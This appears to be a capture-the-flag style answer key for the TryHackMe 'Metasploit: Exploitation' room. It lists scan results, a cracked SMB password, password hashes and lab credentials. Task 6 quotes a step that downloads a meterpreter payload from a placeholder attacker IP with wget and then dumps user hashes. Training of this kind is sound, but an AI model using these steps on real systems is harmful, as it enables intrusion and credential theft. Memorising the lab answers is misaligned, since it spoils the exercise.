Skip to main content

THM | Metasploit: Exploitation

· 3 min read

Windows Exploitation Basics | Metasploit: Exploitation | Summary:

This series of walkthroughs aims to help out complete beginners with finishing the Complete Beginner path on the TryHackMe website. It is based on the learning content provided in the Metasploit: Exploitation room.

Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.

Task | 1 | Introduction

Question 1: Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.

No answer needed

Task | 2 | Scanning

Question 1: How many ports are open on the target system?

5

Question 2: Using the relevant scanner, what NetBIOS name can you see?

ACME IT SUPPORT

Question 3: What is running on port 8000?

webfs/1.21

Question 4: What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.

leo1234

Task | 3 | The Metasploit Database

Question 1: No answer needed

No answer needed

Task | 4 | Vulnerability Scanning

Question 1: Who wrote the module that allows us to check SMTP servers for open relay?

Campbell Murray

Task | 5 | Exploitation

Question 1: Exploit one of the critical vulnerabilities on the target VM

No answer needed

Question 2: What is the content of the flag.txt file?

<flag>

Question 3: What is the NTLM hash of the password of the user "pirate"?

8ce9a3ebd1647fcc5e04025019f4b875

Task | 6 | Msfvenom

Question 1: Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type sudo su to get a root shell, this will make things easier.

No answer needed

Question 2: Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).

No answer needed

Question 3: Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://<ATTACKING_MACHINE_IP>:9000/shell.elf to download it to the target machine).

No answer needed

Question 4: Get a meterpreter session on the target machine.

No answer needed

Question 5: Use a post exploitation module to dump hashes of other users on the system.

No answer needed

Question 6: What is the other user's password hash?

$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Task | 7 | Summary

Question 1: No answer needed

No answer needed